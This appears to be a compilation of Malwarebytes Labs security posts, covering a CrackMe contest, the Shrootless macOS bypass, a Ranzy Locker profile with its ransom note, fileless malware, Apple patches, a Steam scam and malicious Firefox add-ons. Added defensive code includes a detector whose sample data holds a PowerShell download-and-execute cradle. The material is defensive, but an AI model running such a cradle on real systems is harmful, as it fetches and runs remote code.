IT NEWS

The return of the Malwarebytes CrackMe

This blog post was authored by Hasherezade

Twice in the past (2017, 2018) we published a Capture-The-Flag challenge dedicated to aspiring malware analysts. Each time it was a Windows executable containing up to 3 stages to break in order to get the final flag. The goal of the crackme was to give contestants an exercise in understanding and overcoming techniques commonly present in real-life malware, presented on a harmless example.

After a long break, we decided to resume our small contest, and possibly make it an annual event. Without further ado, we present the Malwarebytes CrackMe number 3!

Rules of the contest

The rules remain mostly unchanged since the second edition. As before we have two parallel tracks of the contest:

  1. The fastest solve. The three earliest submitted flags win. The flag should be submitted along with (minimalist) notes about the steps taken to find it. (No detailed write-up is required.) Any updates about the known winners in this category will be appended to this post.
  2. The best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide an explanation of the techniques used in the challenge. Write-up submissions close two weeks after the start of the challenge.

In each track we will select three winners that will be rewarded with unique Malwarebytes swag. The first place winner in each category will additionally get any IT-related book of their choice. All the solvers are going to be listed in our hall of fame.

The flag is in format: flag{...}

Submissions to both contests should be sent as a private message to the Twitter account: @hasherezade.

Three weeks after the challenge started we will publish the closing summary, along with the detailed walk-through, provided by the author.

WARNING: We are sorry, but Malwarebytes employees and people who had access to the CrackMe before the official publication are not allowed to participate.

The application

The application is a Windows executable. It was tested on Windows 8 and above.

WARNING: please note that, since the CrackMe contains techniques similar to those used in malware, it may be flagged by various AV products. This is a known false positive. We recommend running it on a VM with Windows Defender disabled.

You can download it here.


Best of luck, and have fun!

Hall of fame

We already have the first winner in the category “the fastest solve”:

  1. 🥇 @nazywam

Who will be next?

The post The return of the Malwarebytes CrackMe appeared first on Malwarebytes Labs.

Shrootless: Microsoft finds Apple macOS vulnerability

Microsoft researchers have discovered a vulnerability in macOS, dubbed Shrootless, that can allow attackers to bypass System Integrity Protection (SIP) and perform malicious activities, such as gaining root privileges and installing rootkits on vulnerable devices.

Microsoft reported the Shrootless attack to Apple’s security team earlier this year, together with a proof-of-concept that showed how the bug could be abused to install a malicious kernel extension (rootkit).

What is SIP?

SIP, also known as “rootless”, is designed to lock down the system from root by leveraging the Apple sandbox to protect the entire platform. Being able to bypass SIP essentially gives the attacker full control of the system, because they can run arbitrary code without the protection kicking in.

Step by step, Apple has hardened SIP over the years against attacks by improving and fine-tuning the restrictions. One of the most effective SIP restrictions is the filesystem restriction. Without these restrictions, an attacker would be able to access and drop files in areas of the file system that are not intended for application files. The amount of damage an attacker can do to a device’s critical components is directly tied to their ability to write unrestricted data to disk.

Since the filesystem restrictions are so powerful, Apple had to implement some exceptions. One of those exceptions is the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.

The vulnerability

The Shrootless vulnerability could be used by an attacker to modify protected parts of the file system by abusing inherited permissions. Microsoft shared its findings with Apple through Coordinated Vulnerability Disclosure (CVD). The vulnerability exists in the macOS Big Sur and Monterey operating systems and was patched by Apple on October 25, 2021.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Shrootless is listed under CVE-2021-30892.

The researchers found that during the installation process of a new application, an attacker could hijack the installation process by creating a specially crafted post-installation script and placing it in the location where the installation process looks for the post-installation script.

The gritty details

The method to use this vulnerability is pretty straightforward.

  • Download an Apple-signed package (using wget) that is known to have a post-install script. When installing an Apple-signed package (.pkg file), the package invokes system_installd, which then takes charge of installing it.
  • Plant a malicious /etc/zshenv that checks for its parent process. If the parent is system_installd, the script is able to write to restricted locations. If the package being installed contains any post-install scripts, system_installd runs them by invoking the default shell, which is zsh on macOS. Interestingly, when zsh starts, it looks for the file /etc/zshenv and, if it exists, automatically runs the commands in it.
  • Invoke the installer utility to install the package. This invokes system_installd and, because the package has a post-install script, zsh is started and executes the commands in the planted file.

This way the Shrootless attack bypasses SIP and effectively gives the attacker root access. As this description makes clear, the attacker needs some access to the system to begin with, or they will not be able to plant the necessary /etc/zshenv.

Mitigation

The easiest and best way to avoid falling victim to this vulnerability is to update to macOS Big Sur 11.6.1 or later.

Stay safe, everyone!

The post Shrootless: Microsoft finds Apple macOS vulnerability appeared first on Malwarebytes Labs.

Threat profile: Ranzy Locker ransomware

Ranzy Locker ransomware emerged in late 2020, when the variant began to target victims in the United States. According to a flash alert issued by the FBI, unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021, including victims in the construction, academic, government, IT, and transportation sectors. Ranzy Locker is a successor of ThunderX and AKO ransomware.

Ransomware-as-a-Service 

The group behind Ranzy Locker is not very different in its business approach from other “big game” ransomware gangs. The ransomware is made available using the Ransomware-as-a-Service (RaaS) model, which allows the developers to profit from cybercriminal affiliates who deploy it against victims. It also runs a leak site where data stolen from victims who refuse to pay a ransom is published.

RDP again, and Exchange

Just as the business model is no surprise, neither are the attack methods that Ranzy Locker affiliates use to gain initial access. According to the same FBI alert, a majority of victims reported that the threat actors conducted brute force attacks targeting Remote Desktop Protocol (RDP) credentials to gain access to the victims’ networks. Recent targets reported that the actors leveraged known Microsoft Exchange Server vulnerabilities and phishing as the means of compromising their networks.

Older, and now less frequent, attack methods included malicious spam and use of the RIG exploit kit, which was previously used to spread Princess ransomware.

Recognizing Ranzy Locker 

So, how can you tell whether you have been hit by Ranzy Locker or one of the many other ransomware variants out there? Well, for starters you can tell from the header of the ransom note, which is named readme.txt:

---=== Ranzy Locker 1.1 ===---

Attention! Your network has been locked.
Your computers and server are locked now.
All encrypted files have extension: .ranzy

---- How to restore my files? ----

All files on each host in your network encrypted with strongest encryption algorithms
Backups are deleted or formatted, do not worry, we can help you restore your files

Files can be decrypted only with private key - this key stored on our servers
You have only one way for return your files back - contact us and receive universal decryption program

Do not worry about guarantees - you can decrypt any 3 files FOR FREE as guarantee

Some variants also use file extensions for the encrypted files that show Ranzy Locker was at work. Those extensions are .RNZ, .ranzy, and .RANZYLOCKED, but there are also some that are less helpful and add a random 6-character string.
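A triage script that turns the indicators above into code, added here as an example (it is not from the FBI alert or Malwarebytes' tooling): it recognises the readme.txt header and the extension line in the note, lists files carrying the known Ranzy extensions, and reports clusters of an unknown 6-character extension appended after a file's real extension. The file listing and the shortened note are constructed, and the clustering heuristic is an assumption of the example.

```python
import re
from collections import Counter

# Constructed sample data (not from a real incident): a file listing and a ransom note.
SAMPLE_FILES = [
    r"C:\Users\alice\Documents\budget.xlsx.ranzy",
    r"C:\Users\alice\Documents\report.docx.ranzy",
    r"C:\Users\alice\Desktop\readme.txt",
    r"C:\Share\photos\trip.jpg.RANZYLOCKED",
    r"C:\Share\db\customers.mdb.x7q2pk",
    r"C:\Share\db\orders.mdb.x7q2pk",
    r"C:\Share\db\invoices.pdf.x7q2pk",
    r"C:\Program Files\app\settings.config",
    r"C:\Windows\System32\drivers\etc\hosts",
]
SAMPLE_NOTE = (
    "---=== Ranzy Locker 1.1 ===---\n\n"
    "Attention! Your network has been locked.\n"
    "Your computers and server are locked now.\n"
    "All encrypted files have extension: .ranzy\n"
)

# Extensions the post attributes to Ranzy Locker.
KNOWN_EXTENSIONS = {".rnz", ".ranzy", ".ranzylocked"}
# Header and extension line of the readme.txt ransom note.
NOTE_HEADER = re.compile(r"^---===\s*Ranzy Locker\s+([\d.]+)\s*===---", re.M)
NOTE_EXTENSION = re.compile(r"extension:\s*(\.\S+)", re.I)
# The "random 6 character string" variants: six alphanumerics after lower-casing.
RANDOM_EXT = re.compile(r"\.[a-z0-9]{6}")


def is_ranzy_note(text):
    """Return {'version', 'extension'} when the text carries the Ranzy header, else None."""
    header = NOTE_HEADER.search(text)
    if not header:
        return None
    ext = NOTE_EXTENSION.search(text)
    return {"version": header.group(1), "extension": ext.group(1) if ext else None}


def final_extension(path):
    """Lower-cased last extension of a Windows or POSIX path ('' if there is none)."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    dot = name.rfind(".")
    return name[dot:].lower() if dot > 0 else ""


def has_double_extension(path):
    """True for names like report.docx.x7q2pk, i.e. something appended after the real extension."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name.count(".") >= 2


def triage_files(paths, min_cluster=3):
    """Split a listing into known Ranzy extensions and suspicious random-extension clusters.

    A random extension is only reported when it is appended after an existing
    extension and shared by at least min_cluster files, which keeps single
    legitimate six-letter extensions (for example .config) out of the result.
    """
    known = [p for p in paths if final_extension(p) in KNOWN_EXTENSIONS]
    candidates = Counter(
        final_extension(p)
        for p in paths
        if has_double_extension(p)
        and final_extension(p) not in KNOWN_EXTENSIONS
        and RANDOM_EXT.fullmatch(final_extension(p))
    )
    clusters = {ext: n for ext, n in candidates.items() if n >= min_cluster}
    return {"known_ranzy": known, "random_ext_clusters": clusters}


if __name__ == "__main__":
    print(is_ranzy_note(SAMPLE_NOTE))
    print(triage_files(SAMPLE_FILES))
```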

Behavior 

A typical series of actions performed by Ranzy Locker ransomware is:

  • Find and delete shadow volume copies and other recent backups, and disable the Windows recovery environment.
  • Run the encryption process, but skip files that have .exe, .dll, .sys, .ini, .lnk, .key, .rdp extensions, and exclude paths with strings including AppData, bootPerfLogsPerfBoot, Intel, Microsoft, Windows and Tor Browser.
  • Look for connected machines on the network.
  • Drop the ransom note on the desktop of the affected system.

From what we have noticed, the double-extortion tactic—encrypting and exfiltrating data—is only used on some victims, probably depending on the size of the company and the type of data that was stolen. 

Mitigation 

Based on the behavior of Ranzy Locker, the FBI recommends the following mitigation strategies: 

  • Store regular backups of your data off-site and offline, where attackers can’t reach them.
  • Implement network segmentation, so that an attacker can’t reach all the machines on your network from one compromised foothold.
  • Install and regularly update anti-malware software on all hosts and enable real-time detection. 
  • Install security updates for software, operating systems, and firmware as soon as they are released.
  • Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.  
  • Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
  • Disable unused remote access ports and monitor remote access logs for any unusual activity.  
  • Consider adding an email banner to emails received from outside your organization.  
  • Disable hyperlinks in received emails.
  • Use two-factor authentication when logging into accounts or services.

We would like to add Brute Force Protection to that list. 

IOCs 

Besides the characteristics mentioned in this post, the FBI points to a sample YARA rule for Ranzy Locker, which can be found here.

Stay safe, everyone!

The post Threat profile: Ranzy Locker ransomware appeared first on Malwarebytes Labs.

What is fileless malware?

Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. The malicious payload exists in the computer’s memory, which means nothing is ever written directly to the hard drive.

For an attacker, fileless malware has two major advantages:

  • There is no file for traditional anti-virus software to detect.
  • There is nothing on the hard drive for forensics to discover.

As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible, which makes fileless malware a step forward in the arms race between malware and security products.

Is fileless malware new?

Fileless malware attacks have been around for 20 years at least. The first malware to be classified as fileless was the Code Red Worm, which ran rampant in 2001, attacking computers running Microsoft’s Internet Information Services (IIS).

But in the last few years fileless attacks have become more prevalent. Four years ago, the Ponemon Institute’s “The State of Endpoint Security Risk Report” reported that 77 percent of successful attacks in 2017 were fileless, and that fileless attacks were ten times more likely to succeed. We noted the trend ourselves, with an overview of fileless attacks in 2018.

How is fileless malware delivered?

In the case of the Code Red Worm, the malware exploited a buffer overflow vulnerability that allowed it to write itself directly into memory. Modern ransomware attacks sometimes rely on PowerShell commands that execute code stored on public websites like Pastebin or GitHub.

Fileless malware attacks have also been seen hiding their code inside existing benign files or invisible registry keys. Some use the so-called CactusTorch framework in a malicious document. And sometimes the malicious code does exist on a hard disk, just not on the one that belongs to the affected computer. For example, “USB thief” resides on infected USB devices installed as a plugin in popular portable software. It gathers information on the targeted system and writes that to the USB device.

How to create fileless malware

Our esteemed colleague Vasilios Hioureas has written a walk-through demonstrating some of his own fileless malware attacks. His write-up also nicely shows what modern anti-malware solutions need to do to protect their users against fileless malware attacks: modern-day solutions must contain technology to dynamically detect malicious activity on the system rather than simply detecting malicious files. Old-school signature-based detection is useless when dealing with fileless malware.

What can fileless malware do?

In essence, fileless malware can do anything that “regular” malware can do, but for practical reasons you will often see that there is a limited amount of malicious, fileless code. For more complex programs like ransomware, the fileless malware might act as a dropper, which means the first stage downloads and executes the bigger program which is the actual payload. And, of course, fileless malware can use native, legitimate tools built into a system during a cyberattack.

The most common use cases for fileless malware are:

  • Initial access. The first step of a cyberattack is to gain a foothold on a system. This can be stealing credentials or exploiting a vulnerability in an access point.
  • Harvest credentials. Fileless malware is sometimes used to hunt for credentials, so an attacker can use alternative entry points or elevate their privileges.
  • Persistence. To ensure they have permanent access to a compromised system, an attacker might use fileless malware to create a backdoor.
  • Data exfiltration. An attacker might use fileless malware to hunt for useful information, such as a victim’s network configuration.
  • Dropper and/or payload. A dropper downloads and starts other malware (the payload) on a compromised system. The payload may come as a file, or it can be read from a remote server and loaded into memory directly.

Fileless malware detection

So, how can we find these fileless critters? Behavioral analysis and centralized management are key techniques for detecting and stopping fileless malware attacks. Knowing how to identify attacks and having an overview of the attack surface is, however, easier said than done.

What you need is anti-malware software that uses behavioral analysis, ideally supported by an Artificial Intelligence (AI) component. And for a large attack surface you will need something like a Security Information Event Management (SIEM) system to tie all the alerts and detections together.

In short, detecting malware is no longer a matter of detecting malicious files, but more and more a matter of detecting malicious behavior.
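Behavioral detection of the delivery method described earlier (PowerShell pulling code from a public paste site and running it in memory), added here as an example that is not from Malwarebytes' products: it decodes PowerShell's -EncodedCommand argument and scores a process command line on download-cradle indicators. The command lines are constructed, the paste URL is a placeholder, and the indicator names are assumptions of the example.

```python
import base64
import re


def encode_powershell(command):
    """PowerShell's -EncodedCommand takes base64 over UTF-16LE; used here to build sample lines."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


# Constructed sample process-creation command lines (not real telemetry). The first is
# the pattern the post describes: an encoded command that pulls code from a paste site
# and runs it in memory; the second is an ordinary scheduled script; the third is benign.
SAMPLE_LOGS = [
    "powershell.exe -NoP -W Hidden -Enc "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/PLACEHOLDER')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1",
    "powershell.exe Get-Process | Sort-Object CPU",
]

# -e / -ec / -enc / -EncodedCommand followed by the base64 blob.
ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)

# Behavioural indicators of a download cradle; each category is an assumption of this example.
INDICATORS = {
    "remote_code": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"invoke-expression|\biex\b|frombase64string|reflection\.assembly", re.I),
    "paste_host": re.compile(r"pastebin\.com|raw\.githubusercontent\.com|gist\.github", re.I),
    "stealth_flags": re.compile(
        r"-nop\b|-noprofile|-w(?:indowstyle)?\s+hidden|-noni\b|-exec(?:utionpolicy)?\s+bypass", re.I
    ),
}


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Score one command line: decode any encoded payload, then match indicators on both."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": hits, "score": len(hits)}


if __name__ == "__main__":
    for line in SAMPLE_LOGS:
        result = analyze(line)
        print(f"score={result['score']} indicators={result['indicators']} :: {line[:60]}")
```

A score of 3 or more on a single command line is the kind of event a SIEM rule would escalate, regardless of whether any file ever touched disk.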

Stay safe, everyone!

The post What is fileless malware? appeared first on Malwarebytes Labs.

Update now! Apple patches bugs in iOS and iPadOS

On two consecutive days Apple has released a few important patches. iOS 14.8.1 comes just a month after releasing iOS 14.8 for those who didn’t want to update their iPhones to iOS 15. This update also came as a sort of surprise as it was not beta-tested beforehand.

Earlier this year Apple announced that users would have a choice between updating to iOS 15 as soon as it’s released, or staying on iOS 14 but still receiving important security updates.

Now the differences are starting to show. As you can see in the table below, some patches are specific for 14.8.1 and some are specific for 15.1, while many are shared between them. In total 24 CVEs were covered.

Version 15.1 14.8.1
Release date 25-Oct-21 26-Oct-21
CVE-2021-30907 CVE-2021-30907
CVE-2021-30917 CVE-2021-30917
CVE-2021-30903 CVE-2021-30903
CVE-2021-30905 ————
CVE-2021-30919 CVE-2021-30919
CVE-2021-30881 ————
CVE-2021-30900 CVE-2021-30900
CVE-2021-30914 ————
CVE-2021-30906 ————
CVE-2021-30894 ————
CVE-2021-30886 ————
CVE-2021-30909 CVE-2021-30909
CVE-2021-30916 CVE-2021-30916
CVE-2021-30910 ————
CVE-2021-30911 ————
CVE-2021-30875 ————
CVE-2021-30915 ————
CVE-2021-30902 CVE-2021-30902
CVE-2021-30887 ————
CVE-2021-30888 CVE-2021-30888
CVE-2021-30889 ————
CVE-2021-30890 ————
———— CVE-2021-30883
———— CVE-2021-30918

The ones that stood out

Apple is, for understandable reasons, always a bit secretive about what was fixed, but from what we were able to figure out, these are the most worrying ones by type of vulnerability.

Elevation of privileges

CVE-2021-30906: A vulnerability in the iCloud component of watchOS may allow a local attacker to elevate their privileges. Exploitation requires a simple authentication.

CVE-2021-30907: A vulnerability in the Audio component of watchOS may allow a malicious application to elevate privileges. The attack must be carried out locally and requires a single authentication.

Arbitrary code execution

CVE-2021-30881: A vulnerability in the FileProvider component of watchOS means that unpacking a maliciously crafted archive may lead to arbitrary code execution. The attack can be initiated remotely and needs no authentication, but it requires some user interaction from the victim.

CVE-2021-30883: A vulnerability in the IOMobileFrameBuffer component of Apple tvOS may allow an application to execute arbitrary code with kernel privileges. This issue may have been actively exploited, as previously discussed here.

CVE-2021-30886: A vulnerability in the kernel component of Apple tvOS (Digital Media Player) may allow an application to execute arbitrary code with kernel privileges. The attack must be carried out locally and requires a single authentication.

CVE-2021-30889: A vulnerability in the WebKit component of Apple tvOS means that processing maliciously crafted web content may lead to arbitrary code execution. The attack can be launched remotely and needs no authentication, but it requires some user interaction from the victim.

CVE-2021-30894: A vulnerability in the Image Processing component of the Smartphone OS may allow an application to execute arbitrary code with kernel privileges. The attack must be carried out locally and requires authentication.

CVE-2021-30900: A vulnerability in the GPU Drivers component of the Smartphone OS may allow a malicious application to execute arbitrary code with kernel privileges. The attack must be carried out locally and requires authentication.

CVE-2021-30902: A vulnerability in the Voice Control component of the Smartphone OS may allow a local attacker to cause unexpected application termination or arbitrary code execution. Exploitation requires a simple authentication.

CVE-2021-30903: A vulnerability in the Continuity Camera component of the Smartphone OS may allow a local attacker to cause unexpected application termination or arbitrary code execution. Exploitation requires a simple authentication.

CVE-2021-30909: A vulnerability was found in the kernel component of Apple macOS up to 12.0. An application may be able to execute arbitrary code with kernel privileges. The attack must be carried out locally and requires a simple authentication.

CVE-2021-30914: A vulnerability in the GPU Drivers component of the Smartphone OS may allow an application to execute arbitrary code with kernel privileges. Local access and a single authentication are required for exploitation.

CVE-2021-30916: A vulnerability in the kernel component of the Smartphone OS may allow a malicious application to execute arbitrary code with kernel privileges. The attack must be carried out locally and requires authentication.

CVE-2021-30917: A vulnerability in the ColorSync component of watchOS means that processing a maliciously crafted image may lead to arbitrary code execution. The attack can be launched remotely and needs no authentication, but it requires user interaction by the victim.

CVE-2021-30919: A vulnerability in the CoreGraphics component of the Smartphone OS means that processing a maliciously crafted PDF may lead to arbitrary code execution. The attack can be launched remotely and needs no authentication, but it requires some user interaction from the victim.

Mitigation

Apple advises users to update to iOS 15.1 and iPadOS 15.1, or iOS 14.8.1 and iPadOS 14.8.1, which can be done through the automatic update function or iTunes.

Stay safe, everyone!

The post Update now! Apple patches bugs in iOS and iPadOS appeared first on Malwarebytes Labs.

Watch out for the Steam skin “free knife” scam

Have you ever had someone run up to you in the street and insist you take their free knife? I hope not, because that’s a good way to wind up in a 60-minute police procedural drama. In video game land, however, anything goes. A certain type of scam is showing signs of activity at the moment and it’s likely to claim some victims before the week is out.

It involves, wait for it: someone digitally running up to you and insisting you take their free knife.

Free knife? What do you mean?

Many games on Steam make use of skins. These are fancy overlays of in-game items. You may not impress someone with your boring old default knife, or gun, or item of clothing. A rare graphical enhancement which makes said item look incredibly distinctive, however? Now you’re talking.

Skins are most commonly traded in-game. Sometimes they’re sold for virtual or real cash, although depending on the game, using real money may be against the terms of service. A few games have their trading systems deeply embedded into game platforms. For example, Steam has its own marketplace for transactions.

Are skins used in scams?

Oh boy, are they ever. One of the oldest scams around is skin phishing. The phisher will create a fake marketplace, or an imitation of a real game-themed lounge, or even just a fake user’s trading inventory page. Account compromise, and/or malware usually follows.

What does this particular scam involve?

It’s a tactic designed to scam people in the fastest way imaginable. What the scammer does can charitably be described as “minimal”. In short, they’ll send a message to potential victims on Steam or on services such as Discord. There are variations in messaging, but the essence remains the same.

“Yo, I don’t know you unfortunately, but this is for you, I do not need that knife [link]”

“I haven’t met you unfortunately (or not lol), but take it, I dont don’t need that skin [link]”

“G’day – I don’t need this bayonet just take it [link]”

Note the similarities in the first and second messages. It’s hard to say if the messages are manually typed out or automated, but we seem to be peeking at the typical indicators of a deliberate decision to try this tactic out.

Once the account is phished, the victim will have to go through Steam support to try and recover it. Accounts can have an awful lot of money tied to them. There may be thousands of dollars worth of titles bound to it. It may have hundreds of dollars in the user’s Steam wallet. There could be a ton of rare items, gifts, and other content sitting in the user’s Inventory page. Pretty much anything in there is at risk once the scammer gets their claws into the account, and account recovery can be rather stressful at the best of times.

How can I keep my Steam account secure?

Steam has a comprehensive list of security tips for its users. They include everything from phishing tips and general safety advice to account verification and two-factor authentication.

As for the free knives, bayonets, and anything else? Leave the mysterious strangers and their too-good-to-be-true murder objects to the crime dramas and keep that police cordon up around your Steam account.

The post Watch out for the Steam skin “free knife” scam appeared first on Malwarebytes Labs.

How social media mistakes can impact cybersecurity

We talked to members of our Malware Removal Support team and asked them what kind of problems they get asked to solve for our customers.

To understand why they get to handle these questions, it is also necessary to know that these are problems the Malwarebytes software itself cannot resolve. Many of them can be categorized under the header of trusting the wrong people.

Privacy concerns

You know how it freaks people out when Facebook shows them advertisements for things they have only just thought about buying? Many wonder how Facebook knows this.

They say, “I haven’t searched for the item yet, but here they are showing me this advertisement.”

It gets even worse when people have had a private conversation about it, and they think the advertisers or the platform has been eavesdropping on them.

Most of the time that is not true. So, how do the platforms know what ads to serve you?

  • Algorithms are smarter than most people think. Have you heard the story about the family that got coupons for baby clothes and cribs even before their daughter told them she was expecting? We humans are way more predictable than we’d like to think.
  • Users of social media and Facebook in particular tend to forget how many people can see the “public” part of their profile and posts.
  • Websites share information about your scrolling behavior through cookies, FLoC, and other trackers.

Some people get so convinced they have spyware on their system that they contact our support team to help them get rid of it. All we can do is inform the public and point those looking for help in the right direction.

More Facebook concerns

Besides people not securing their Facebook settings and making everything public, they also make more blatant mistakes like posting their email addresses, clicking on links to surveys in Facebook, clicking on unsolicited links in Messenger, and answering posts that phish for information that makes it easier to guess your passwords.

Every Facebook user will have seen posts like this. Don’t give information like that away.

This comment by one MRS agent during our discussion says a lot:

“I had 2 friends on Facebook today get their profiles taken over because they clicked links they shouldn’t have clicked.”

When these mishaps happen, all our Support team can do is tell people they have to contact Facebook, as unfortunately we can’t help them.

Other password shenanigans

Another privacy-related concern we often get asked about is the sextortion emails that try to intimidate the recipient by telling them the attacker has their password. But that password usually originates from some security breach, and the sender has just found it in a data dump somewhere. A quick way to check is a visit to the Have I Been Pwned? website.

If you do get an email like this, you should change the password anywhere you use it. And please use Multi-Factor Authentication wherever possible.

Social media and scams

Social media is a perfect way for scammers to reach a lot of people, and we often see them using this to round up victims. There are many kinds of Bitcoin scams to be found on YouTube, Twitter, and other platforms. And along with Tech Support scams, Ponzi schemes, misinformation, and many phishing attempts, you can find every kind of scammer on social media without having to look very hard.

A few more tips

To round this off, we assembled a few other mistakes our team sees a lot. Steering clear of these can save you a lot of trouble.

  • Letting browsers save their passwords. Use a password manager or password book for them, especially if you are sharing your system with others.
  • Never backing up their system. We understand it can be cumbersome, but imagine the misery when you lose access, be it because of ransomware or a hard drive failure.
  • Using cracks and keygens. The oldest trick in the book to spread malware is to tell visitors that it is a crack or keygen for a popular game or other software.
  • Using torrent software. The same as for cracks and keygens applies here—unless you can verify what you are receiving, don’t download anything from anyone.

Stay safe, everyone!

The post How social media mistakes can impact cybersecurity appeared first on Malwarebytes Labs.

Patch now to bypass Firefox add-ons that abuse the proxy API to deny updates

In a Firefox security announcement, Mozilla said 455,000 users have downloaded Firefox add-ons that interfere with how they connect to the internet.

The interference in itself was not the deciding factor, however. The add-ons abused the proxy API to prevent users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content.

What is the proxy API?

The proxy API can be used by add-on developers as an event listener to intercept web requests, and return an object that describes whether and how to proxy them. Add-ons that use the proxy API need the “proxy” permission. And where they want to intercept requests, they also need “host” permission for the URLs of intercepted requests.

Google Chrome provides an extension API also called “proxy” which is functionally similar to this API, in that extensions can use it to implement a proxying policy. However, the design of the Chrome API is completely different to this API. They are incompatible, which means using both is NOT recommended as it may result in connectivity issues.

Abuse cases

Mozilla says the add-ons were advertised to users as being able to bypass paywall restrictions on websites. It is unknown whether the blocking of updates was intentional and whether the add-ons were performing other malicious actions.

Mozilla has blocked the malicious add-ons so they cannot be installed by anyone else. Starting with Firefox 91.1, Firefox includes changes to fall back to direct connections when an important request (such as one for updates) is made via a proxy configuration that fails. By doing so, users cannot be denied important updates.

Mitigation

Mozilla stopped accepting add-on submissions that use the proxy API until fixes were available for all users.

One of those fixes is a system add-on named “Proxy Failover” (ID: proxy-failover@mozilla.com) that Mozilla deployed with additional mitigations to both current and older Firefox versions. This system add-on implements failover rules for system requests over malfunctioning proxies: if a proxied system request fails, the proxy configuration in use is disabled.

As usual, make sure your browser is up to date. The latest version of the Firefox Standard Release for Desktop is at 93.0.


If you are not running the latest version and have not disabled updates, you may want to check whether you are affected by this issue. First, try updating Firefox manually: in the menu click Settings, then on the General tab scroll down to Firefox Updates and click the Check for updates button. Recent versions of Firefox ship with an updated blocklist that automatically disables the malicious add-ons, so the update should go through.

If that does not work, you are advised to check in the Add-ons section and search for one of the following entries:

  • Name: Bypass, ID: {7c3a8b88-4dc9-4487-b7f9-736b5f38b957}
  • Name: Bypass XM, ID: {d61552ef-e2a6-4fb5-bf67-8990f0014957}

Please make sure the ID matches exactly as there might be other, unrelated add-ons using those or similar names. If none of those IDs are shown in the list, you are not affected.

If you do find one of these entries, you can remove the add-on under the Add-ons and themes section of the menu by clicking on the three horizontal dots and selecting Remove from the dropdown menu.


Using the proxy API going forward

Developers who wish to use the proxy API for legitimate reasons are asked to include a strict_min_version key in their manifest.json files targeting “91.1” or above. This ensures that their users will not suffer blocked updates, and it will expedite the review of the add-on.
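The following is an added example of how a legitimate proxy add-on fits the two points above (the “proxy” and host permissions the API requires, and the strict_min_version Mozilla asks proxy add-ons to pin). It is not Mozilla's code and not code from any of the add-ons discussed. The manifest is built as a plain object so the policy check can run outside the browser, and the request handler is a pure function so it can be unit-tested. The hostnames, the upstream proxy, the add-on ID and name, and the helper names (buildManifest, compareVersions, manifestMeetsProxyPolicy, decideProxy) are all constructed for this illustration; a real add-on would list its own exemptions.

```javascript
// Added example, not Mozilla's or any add-on's own code.
// Hosts this add-on never proxies. Constructed sample values: the point is that
// browser-critical traffic (update checks, blocklist fetches) is routed direct,
// so a misbehaving upstream proxy cannot block it.
const SYSTEM_HOSTS = new Set(["updates.example.net", "blocklist.example.net"]);

// Upstream proxy used for everything else. Constructed sample value.
const UPSTREAM = { type: "http", host: "proxy.example.org", port: 8080 };

// The manifest.json an add-on using the proxy API would ship (as an object here).
function buildManifest() {
  return {
    manifest_version: 2,
    name: "Example proxy add-on", // constructed
    version: "1.0.0",
    // "proxy" is required to use browser.proxy; a host permission is required
    // for every URL the listener is allowed to see.
    permissions: ["proxy", "<all_urls>"],
    browser_specific_settings: {
      gecko: {
        id: "proxy-example@example.org", // constructed
        // Only install on builds that carry the direct-connection fallback.
        strict_min_version: "91.1",
      },
    },
  };
}

// Numeric comparison of dotted version strings: negative, zero or positive.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Review-style check: a manifest that requests "proxy" must also pin
// strict_min_version to 91.1 or later. Manifests without "proxy" pass.
function manifestMeetsProxyPolicy(manifest) {
  const perms = manifest.permissions || [];
  if (!perms.includes("proxy")) return true;
  const min = manifest.browser_specific_settings?.gecko?.strict_min_version;
  return typeof min === "string" && compareVersions(min, "91.1") >= 0;
}

// Pure policy for browser.proxy.onRequest: given the requestInfo object the
// API passes, return a ProxyInfo object. Unparseable URLs and system hosts go
// direct; everything else goes to the upstream proxy.
function decideProxy(requestInfo) {
  let host;
  try {
    host = new URL(requestInfo.url).hostname;
  } catch {
    return { type: "direct" };
  }
  if (SYSTEM_HOSTS.has(host)) return { type: "direct" };
  return { ...UPSTREAM };
}

// Register the listener only where the WebExtension API exists; when this file
// is run under Node for testing, registration is skipped.
if (globalThis.browser?.proxy?.onRequest) {
  browser.proxy.onRequest.addListener(decideProxy, { urls: ["<all_urls>"] });
}
```

The manifest check is the kind of gate an add-on reviewer or a CI step can apply: any manifest that asks for “proxy” without a strict_min_version of 91.1 or later is rejected before the code is even looked at.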

Stay safe, everyone!

The post Patch now to bypass Firefox add-ons that abuse the proxy API to deny updates appeared first on Malwarebytes Labs.

